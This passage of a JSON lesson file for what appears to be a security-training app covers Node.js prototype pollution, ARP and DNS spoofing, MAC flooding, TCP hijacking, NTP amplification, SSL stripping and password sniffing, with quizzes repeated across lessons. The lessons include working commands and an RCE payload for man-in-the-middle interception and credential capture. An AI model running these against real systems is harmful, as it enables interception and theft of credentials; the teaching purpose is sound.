requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-prototype-pollution-server","cat":"Web Application","title":"Server-Side Prototype Pollution","diff":5,"xp":300,"intro":"Exploit prototype pollution in Node.js for RCE.","sections":[{"type":"text","content":"Server-side prototype pollution in Node.js can be chained with: child_process.exec() env pollution, EJS/Pug template gadgets, or constructor.prototype abuse for RCE."},{"type":"code","lang":"javascript","content":"// Pollute Object.prototype with shell command\n{\"__proto__\":{\"shell\":\"/proc/self/exe\",\"argv0\":\"console.log(require('child_process').execSync('id').toString())\",\"NODE_OPTIONS\":\"--require /proc/self/cmdline\"}}\n// Or via EJS template gadget:\n{\"__proto__\":{\"outputFunctionName\":\"x;process.mainModule.require('child_process').execSync('id');s\"}}"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Server-side prototype pollution differs from client-side by...","opts":["Nothing","Leading to RCE instead of just XSS","Being easier","Using different syntax"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"n-arp-spoof2","cat":"Network Attacks","title":"ARP Spoofing Fundamentals","diff":1,"xp":75,"intro":"Become the man-in-the-middle on a LAN.","sections":[{"type":"text","content":"ARP has no authentication. Send fake ARP replies to associate your MAC with the gateway IP. All traffic flows through you."},{"type":"code","lang":"bash","content":"echo 1 > /proc/sys/net/ipv4/ip_forward\narpspoof -i eth0 -t victim gateway\narpspoof -i eth0 -t gateway victim\n# Or: bettercap -iface eth0 -eval 'arp.spoof on; net.sniff on'"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"ARP spoofing works because ARP...","opts":["Is encrypted","Has no authentication mechanism","Uses TCP","Requires a password"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-mac-flooding","cat":"Network Attacks","title":"MAC Address Table Flooding","diff":2,"xp":150,"intro":"Overflow a switch's CAM table to make it act like a hub.","sections":[{"type":"text","content":"Send thousands of frames with random source MACs. When the CAM table overflows, the switch floods all traffic to all ports."},{"type":"code","lang":"bash","content":"macof -i eth0  # flood with random MACs\n# Or with yersinia\nyersinia eth -attack 6 -interface eth0\n# Defense: port security (limit MACs per port)"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"When a switch's CAM table overflows, it...","opts":["Drops all traffic","Broadcasts all traffic to all ports (acts like a hub)","Reboots","Encrypts traffic"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-dns-spoof","cat":"Network Attacks","title":"DNS Spoofing with Ettercap","diff":2,"xp":150,"intro":"Redirect victims to fake websites by spoofing DNS responses.","sections":[{"type":"text","content":"After ARP spoofing, intercept DNS queries and respond with your IP. Victims' browsers load your fake page instead of the real one."},{"type":"code","lang":"bash","content":"# Create DNS spoofing file\necho 'target.com A 10.10.14.1' > dns.txt\n# Run with ettercap\nettercap -Tq -i eth0 -P dns_spoof -M arp:remote /gateway// /victim//\n# Or bettercap\nbettercap -eval 'set dns.spoof.domains target.com; set dns.spoof.address 10.10.14.1; dns.spoof on; arp.spoof on'"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"DNS spoofing requires being...","opts":["On a different network","In a MITM position (usually via ARP spoofing first)","On the DNS server","Root on the target"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-tcp-hijack","cat":"Network Attacks","title":"TCP Session Hijacking","diff":3,"xp":200,"intro":"Take over an existing TCP connection by predicting sequence numbers.","sections":[{"type":"text","content":"If you can predict TCP sequence numbers and inject packets with the correct source IP, you can inject data into an active session or take it over."},{"type":"code","lang":"bash","content":"# Monitor sequence numbers\ntcpdump -i eth0 -nn 'tcp and host victim' -S\n# Inject a packet with predicted sequence number\nhping3 -s victim_port -p server_port -A -M seq_num -L ack_num target\n# Modern systems use random initial sequence numbers (ISNs)"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Modern TCP hijacking is harder because...","opts":["TCP is encrypted","Initial sequence numbers are randomized","TCP uses UDP","Firewalls block it"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-ntp-amplification","cat":"Network Attacks","title":"NTP Amplification DDoS","diff":3,"xp":200,"intro":"Abuse NTP monlist for reflected amplification attacks.","sections":[{"type":"text","content":"NTP's monlist command returns a list of recent clients. A small request generates a large response. Spoofing the source IP directs the flood at the victim."},{"type":"code","lang":"bash","content":"# Check for NTP monlist\nntpdc -c monlist target_ntp_server\n# Amplification factor: ~556x\n# A 1 Mbps attacker can generate 556 Mbps at the victim\n# Defense: disable monlist, upgrade NTP"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"NTP amplification works by...","opts":["Cracking NTP","Sending small requests that generate large responses to a spoofed IP","Exploiting NTP bugs","Brute-forcing NTP"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-ssl-strip","cat":"Network Attacks","title":"SSL Stripping Attack","diff":2,"xp":150,"intro":"Downgrade HTTPS connections to HTTP to intercept traffic.","sections":[{"type":"text","content":"As MITM, intercept the victim's HTTP request to a site. Fetch the HTTPS version yourself, then serve it back to the victim over HTTP. You see the cleartext."},{"type":"code","lang":"bash","content":"# Run sslstrip\nsslstrip -l 8080\n# Redirect traffic through sslstrip\niptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080\n# Or use bettercap\nbettercap -eval 'set http.proxy.sslstrip true; http.proxy on; arp.spoof on'"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"HSTS prevents SSL stripping because...","opts":["It encrypts ARP","The browser remembers to always use HTTPS","It blocks attackers","It validates certificates"],"ans":1},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-password-sniffing","cat":"Network Attacks","title":"Network Password Sniffing","diff":1,"xp":75,"intro":"Capture cleartext credentials from unencrypted protocols.","sections":[{"type":"text","content":"FTP, HTTP, Telnet, SMTP, POP3 send credentials in cleartext. Capture them with tcpdump or Wireshark on a shared network or after ARP spoofing."},{"type":"code","lang":"bash","content":"# Capture FTP credentials\ntcpdump -i eth0 port 21 -A | grep -iE 'USER|PASS'\n# Capture HTTP POST data\ntcpdump -i eth0 port 80 -A | grep -iE 'user|pass|login'\n# Wireshark filter\nhttp.request.method == POST"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"FTP sends passwords...","opts":["Encrypted","In cleartext (readable by anyone on the network)","Hashed","Compressed"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The 